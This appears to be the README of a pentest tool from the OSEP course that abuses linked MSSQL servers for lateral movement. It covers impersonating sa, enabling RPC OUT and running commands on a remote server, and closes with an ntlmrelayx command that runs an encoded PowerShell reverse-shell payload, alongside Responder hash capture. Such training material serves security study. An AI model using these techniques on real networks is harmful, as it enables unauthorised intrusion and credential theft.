SQLinks2Move is a tool created during OSEP PEN-300 course. This tool is used to link SQL servers and perform Lateral Movement.
It depends, which value you entered into it. Basically, once you specify all the values it will do the following :
- It authenticate on your actual given SQL Server name, connect to it and to the database.
- It will login as the current user.
- It will mapp the user.
- It will check if your current user is a member of public role. Then check if its a member of sysadmin role.
- It will link the databases if possible.
- It will check if there is an impersonable login by two differents way.
- If specified, it will try to perform NTLM relay hash, you should setup responder or impacket-ntlmrelayx before using it.
- It will check if RPC OUT is enabled.
- It will try to enable RPC OUT if disabled.
- It will impersonate the given username (if there is an impersonable user)
- It will execute the given command on the specified remote linked SQL server.
To a full understanding, refere to the code.
An analyse of the code will be created to get a better documentation.
-
First load the SQLinks2Move folder inside Visual Studio and compile the code as Release.
-
Then upload SQLinks2Move.exe to the target SQL Server that you already own.
-
Execute SQLinks2Move.exe
-
Specify your values when prompted.
For legal reason, I have hidden sensitive informations on the pictures. So i will give random informations to lead you througt this demo.
First running whoami, we see that we are PANDA\sqlsvc. Running hostname told us that we are on the domaine machine name KOALA01.
Running SQLinks2Move binary, specifying servername KOALA01 database master and leaving blank all others value except for RPC, where we choose "N" on both, return this result.
We can see that the authentication is a success, we are mapped as dbo we are member of public and sysadmin role. We linked two SQL Server which are KOALA01\SQLEXPRESS and PIZZA03. The login sa can be impersonated.
Re-running SQLinks2Move.exe but this time specifying the user to impersonate sa, executing the command hostname against the server PIZZA03, checking if RPC is enabled, and allow to enable it.
We see that we impersonated sa with sucess, that RPC OUT was disabled (Because of "False" answer), we enabled it, executed hostname as sa against PIZZA03 return the result of command PIZZA03
We can do command execution, so for example, using web_delivery metasploit module using powershell payload, we should be able to retrieve a shell on PIZZA03
By setting up responder with sudo responder -I [interface], and specifying your LHOST when prompted by SQLinks2Move.exe, we can retreive NTLM hash and attempt to crack it.
Alternatively we can setup impacket-ntlmrelayx and execute a command to get a reverse shell on PIZZA03 if the target is vulnerable.
For example using :
sudo impacket-ntlmrelayx --no-http-server -smb2support -t [PIZZA03_ip_address] -c 'powershell -enc <base64>'TODO : Screenshot of impacket-ntlmrelayx